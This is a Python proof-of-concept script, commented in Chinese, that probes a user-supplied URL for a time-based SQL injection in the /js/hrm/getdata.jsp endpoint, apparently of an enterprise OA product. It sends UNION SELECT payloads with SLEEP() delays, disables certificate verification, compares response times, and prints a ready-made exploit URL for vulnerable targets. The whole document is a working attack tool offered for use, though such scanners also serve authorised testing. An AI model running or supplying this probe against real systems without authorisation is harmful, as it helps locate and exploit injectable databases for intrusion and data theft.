import requests
import time
from urllib.parse import quote
import warnings
# 禁用SSL警告
warnings.filterwarnings("ignore", message="Unverified HTTPS request")

def check_sqli_time_based(target_url):
    # 测试参数设置
    normal_sleep = 1  # 基准睡眠时间
    attack_sleep = 3  # 攻击睡眠时间
    threshold = 500   # 网络延迟容差(ms)

    # 构造请求头
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Referer': f"{target_url.rstrip('/')}/wui/index.html"
    }

    # 基准测试
    baseline_payload = f"1 union select 1,2,3,4,5,SLEEP({normal_sleep})#"
    params = {
        'cmd': 'savect',
        'arg0': quote(baseline_payload),
        'arg1': '1',
        'arg2': '2',
        'arg3': '3'
    }

    # 发送基准请求（忽略证书验证）
    start_time = time.time()
    try:
        requests.get(
            f"{target_url.rstrip('/')}/js/hrm/getdata.jsp",
            params=params,
            headers=headers,
            verify=False,
            timeout=normal_sleep+2
        )
        baseline_latency = (time.time() - start_time) * 1000
    except requests.exceptions.Timeout:
        return True, f"基准请求超时，可能已触发SQL注入"
    except Exception as e:
        return False, f"基准请求错误: {str(e)}"

    # 攻击测试
    attack_payload = f"1 union select 1,2,3,4,5,SLEEP({attack_sleep})#"
    params['arg0'] = quote(attack_payload)

    # 发送攻击请求（忽略证书验证）
    start_time = time.time()
    try:
        requests.get(
            f"{target_url.rstrip('/')}/js/hrm/getdata.jsp",
            params=params,
            headers=headers,
            verify=False,
            timeout=attack_sleep+2
        )
        attack_latency = (time.time() - start_time) * 1000
    except requests.exceptions.Timeout:
        return True, f"攻击请求超时，确认存在SQL注入"
    except Exception as e:
        return False, f"攻击请求错误: {str(e)}"

    # 结果判断
    if (attack_latency - baseline_latency) >= (attack_sleep - normal_sleep) * 1000 - threshold:
        return True, f"存在SQL注入漏洞！延迟差异：{attack_latency-baseline_latency:.2f}ms"
    return False, "未检测到SQL注入漏洞"

if __name__ == "__main__":
    target = input("请输入目标URL（例如 http://192.168.1.1 或 https://example.com）: ").strip()
    print(f"\n开始检测目标: {target}")
    
    result, message = check_sqli_time_based(target)
    print("\n检测结果:")
    print(message)
    
    if result:
        print("\n漏洞验证Payload示例:")
        print(f"GET {target.rstrip('/')}/js/hrm/getdata.jsp?cmd=savect&arg0=1%20union%20select%201,2,3,4,5,SLEEP(3)%23&arg1=1&arg2=2&arg3=3")